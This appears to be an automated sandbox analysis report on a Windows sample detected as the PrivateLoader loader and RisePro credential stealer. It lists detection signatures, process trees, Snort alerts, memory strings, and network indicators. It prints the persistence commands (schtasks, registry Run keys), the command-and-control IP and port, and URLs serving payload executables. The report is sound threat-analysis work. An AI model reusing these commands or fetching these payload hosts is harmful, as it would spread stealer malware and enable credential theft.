
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1440169
MD5: a594a9e1f8db460345e86810d1c9a639
SHA1: ca9a256f48c6059909926c6fa547c56f9a2df9c0
SHA256: d8e3a7e5df4c2591b40d2af7a224c6e5cb18e11d27cbfdbfdda4e02db33c849e
Tags: exe

Detection

PrivateLoader, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected PrivateLoader
Yara detected RisePro Stealer
Creates HTML files with .exe extension (expired dropper behavior)
Found stalling execution ending in API Sleep call
PE file contains section with special chars
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 2608 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A594A9E1F8DB460345E86810D1C9A639)
    • schtasks.exe (PID: 2892 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5016 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\_LQmmrlytjrHiMTfplY7yVS.zip | JoeSecurity_RiseProStealer | Yara detected RisePro Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.2602349258.00000000064D0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security |
00000000.00000003.2602143972.0000000006419000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security |
00000000.00000003.2602388516.0000000006454000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security |
00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RiseProStealer | Yara detected RisePro Stealer | Joe Security |
00000000.00000003.2601984271.0000000006490000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security |
(6 further entries not shown)

Source | Rule | Description | Author | Strings
0.3.file.exe.6454b80.4.raw.unpack | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security |
0.3.file.exe.6454b80.2.raw.unpack | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security |
0.2.file.exe.6b70000.1.unpack | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security |
0.2.file.exe.6b70000.1.raw.unpack | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security |
0.3.file.exe.64909c0.1.raw.unpack | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security |
(1 further entry not shown)

                        System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 2608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 2608, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk

Snort IDS alerts

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
05/12/24-12:31:54.639253 | 2049660 | 50500 | 49706 | TCP | A Network Trojan was detected
05/12/24-12:31:56.533300 | 2046266 | 50500 | 49724 | TCP | A Network Trojan was detected
05/12/24-12:30:54.955577 | 2049060 | 49706 | 50500 | TCP | A Network Trojan was detected
05/12/24-12:31:54.793116 | 2046269 | 49706 | 50500 | TCP | A Network Trojan was detected
05/12/24-12:30:57.462316 | 2046267 | 50500 | 49706 | TCP | A Network Trojan was detected
05/12/24-12:30:59.409434 | 2046268 | 49706 | 50500 | TCP | A Network Trojan was detected
05/12/24-12:30:55.309898 | 2046266 | 50500 | 49706 | TCP | A Network Trojan was detected


                        AV Detection

Source: file.exe | Avira: detected
Source: https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/waypoints.js?ver=2.2.0 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.cs | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/newhome-core/assets/plugins/modernizr/modernizr.js?ver=6.5.3 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.14.0 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/upgrade/k.exeY | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/upgrade/k.exe | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15. | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/inc/shortcodes/parallax-images/assets | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/main.css?ver=6.5.3 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/uploads/2023/06/logo-white.png | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/themes/newhome/assets/js/main.min.js?ver=6.5.3 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/google-map.js?ver=6.5.3 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/uploads/elementor/css/custom-frontend-lite.min.css?ver=1690457761 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/css/htmega-keyframes.css?ver=2.2 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ve | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/newhome-core/assets/css/newhome-core.min.css?ver=6.5.3 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/uploads/2023/03/error-page-bg-img.jpg); | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/popper.min.js?ver=2.2.0 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/qi-blocks/inc/slider/assets/plugins/5.4.5/swiper.min.css?ver= | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/uploads/2023/06/logo.png | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/uploads/elementor/css/global.css?ver=1690457762 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/assets/css/main.min.css?ver=6.5.3 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/qode-framework/inc/common/assets/plugins/select2/select2.full | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/icons/font-awesome/assets/css/all.min.css?ve | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/uploads/2023/06/cropped-fav-192x192.png | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/uploads/elementor/css/custom-widget-icon-box.min.cs | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/header-footer-elementor/inc/js/frontend.js?ver=1.6.14 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/themes/newhome/assets/css/main.min.css?ver=6.5.3 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/themes/newhome/style.css?ver=6.5.3 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/css/animation.css?ver=2.2.0 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/htbbootstrap.js?ver=2.2.0 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/main.js?ver=6.5.3 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/plugins/elementor/assets/js/elementor.min.js | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/uploads/elementor/css/post-2951.css?ver=1690457763 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/upgrade/k.exexe | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/inc/plugins/elementor/assets/js/eleme | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/custom-marker.js?ver=6.5.3 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/newhome-core/assets/js/newhome-core.min.js?ver=6.5.3 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/markerclusterer.js?ver=6.5.3 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.6.13 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.14.0 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/page-links-to/dist/new-tab.js?ver=3.3.6 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/uploads/elementor/css/custom-widget-icon-box.min.css?ver=1687512247 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/plugins/custom-twitter-feeds/css/ctf-styles.min.css?ver=2.1.1 | Avira URL Cloud: Label: malware
Source: https://easy2buy.ae:80/wp-content/upgrade/k.exe | Virustotal: Detection: 5%
Source: file.exe | ReversingLabs: Detection: 63%
Source: file.exe | Virustotal: Detection: 57%
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B66A80 CryptUnprotectData, 0_2_00B66A80
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.5:49722 version: TLS 1.2

                        Spreading

Source: Yara match | File source: 0.3.file.exe.6454b80.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.6454b80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.6b70000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.6b70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.64909c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2602349258.00000000064D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2602143972.0000000006419000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2602388516.0000000006454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2601984271.0000000006490000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2602058976.0000000006B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BB2EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 0_2_06BB2EAD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BCCCFD FindFirstFileExW, 0_2_06BCCCFD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06B7B2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError, 0_2_06B7B2C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06B7BAC0 FindFirstFileA,SetFileAttributesA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError, 0_2_06B7BAC0

                        Networking

Source: Traffic | Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.5:49706 -> 5.42.96.65:50500
Source: Traffic | Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 5.42.96.65:50500 -> 192.168.2.5:49706
Source: Traffic | Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 5.42.96.65:50500 -> 192.168.2.5:49706
Source: Traffic | Snort IDS: 2046268 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) 192.168.2.5:49706 -> 5.42.96.65:50500
Source: Traffic | Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49706 -> 5.42.96.65:50500
Source: Traffic | Snort IDS: 2049660 ET TROJAN RisePro CnC Activity (Outbound) 5.42.96.65:50500 -> 192.168.2.5:49706
Source: Traffic | Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 5.42.96.65:50500 -> 192.168.2.5:49724
Source: Yara match | File source: 0.3.file.exe.6454b80.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.6454b80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.6b70000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.6b70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.64909c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2602349258.00000000064D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2602143972.0000000006419000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2602388516.0000000006454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2601984271.0000000006490000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2602058976.0000000006B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\file.exe | File created: 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr
Source: C:\Users\user\Desktop\file.exe | File created: AdobeUpdaterV2.exe.0.dr
Source: C:\Users\user\Desktop\file.exe | File created: MSIUpdaterV2.exe.0.dr
Source: C:\Users\user\Desktop\file.exe | File created: EdgeMS2.exe.0.dr
Source: global traffic | TCP traffic: 192.168.2.5:49706 -> 5.42.96.65:50500
Source: Joe Sandbox View | IP Address: 34.117.186.192
Source: Joe Sandbox View | IP Address: 193.233.132.175
Source: Joe Sandbox View | ASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: ipinfo.io
Source: global traffic | HTTP traffic detected: GET /widget/demo/81.181.60.11 HTTP/1.1 | Connection: Keep-Alive | Referer: https://ipinfo.io/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: ipinfo.io
Source: global traffic | HTTP traffic detected: GET /demo/home.php?s=81.181.60.11 HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: db-ip.com
Source: global traffic | HTTP traffic detected: GET /wp-content/upgrade/k.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 | Host: easy2buy.ae | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 5.42.96.65 (48 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 193.233.132.175 (2 occurrences)
Source: C:\Users\user\Desktop\file.exe
  Code function: 0_2_00B67A80 recv,setsockopt,recv,recv,recv,recv,recv,recv,__Xtime_get_ticks,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,Sleep,Sleep,0_2_00B67A80

Source: global traffic
  HTTP traffic detected: GET /widget/demo/81.181.60.11 HTTP/1.1
    Connection: Keep-Alive
    Referer: https://ipinfo.io/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
    Host: ipinfo.io

Source: global traffic
  HTTP traffic detected: GET /demo/home.php?s=81.181.60.11 HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
    Host: db-ip.com

Source: global traffic
  HTTP traffic detected: GET /wp-content/upgrade/k.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
    Host: easy2buy.ae
    Cache-Control: no-cache

Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr
  String found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook-f elementor-repeater-item-2a80dba" href="https://www.facebook.com/profile.php?id=100092856517575" target="_blank"> equals www.facebook.com (Facebook)

Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr
  String found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-linkedin-in elementor-repeater-item-ae5da3c" href="http://www.linkedin.com/in/franti equals www.linkedin.com (Linkedin)

Source: global traffic
  DNS traffic detected: DNS query: ipinfo.io

Source: global traffic
  DNS traffic detected: DNS query: db-ip.com

Source: global traffic
  DNS traffic detected: DNS query: easy2buy.ae

Source: global traffic
  HTTP traffic detected: HTTP/1.1 404 Not Found
    Connection: close
    expires: Wed, 11 Jan 1984 05:00:00 GMT
    cache-control: no-cache, must-revalidate, max-age=0
    content-type: text/html; charset=UTF-8
    link: <https://easy2buy.ae/wp-json/>; rel="https://api.w.org/"
    transfer-encoding: chunked
    date: Sun, 12 May 2024 10:31:52 GMT
    server: LiteSpeed
    vary: User-Agent
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: file.exe, 00000000.00000002.3215883795.000000000630F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601885569.000000000630F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmp
  String found in binary or memory: http://193.233.132.175/server/k/l2.exe

Source: file.exe, 00000000.00000002.3215883795.000000000630F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601885569.000000000630F000.00000004.00000020.00020000.00000000.sdmp
  String found in binary or memory: http://193.233.132.175/server/k/l2.exeJp

Source: file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmp
  String found in binary or memory: http://193.233.132.175/server/k/l2.exerCA

Source: file.exe
  String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t

Source: file.exe
  String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#

Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr
  String found in binary or memory: http://gmpg.org/xfn/11

Source: file.exe
  String found in binary or memory: http://ocsp.sectigo.com0

Source: Amcache.hve.0.dr
  String found in binary or memory: http://upx.sf.net

Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr
  String found in binary or memory: http://www.linkedin.com/in/franti

Source: file.exe, 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
  String found in binary or memory: http://www.winimage.com/zLibDll
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/plugins/elementor/assets/css/elementor.min.c
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/plugins/elementor/assets/js/elementor.min.js
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/newhome-membership/assets/css/newhome-membership.min.css?ver=
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/newhome-membership/assets/js/newhome-membership.min.js?ver=6.
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/page-links-to/dist/new-tab.js?ver=3.3.6
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/assets/css/grid.min.css?ver=6.5.3
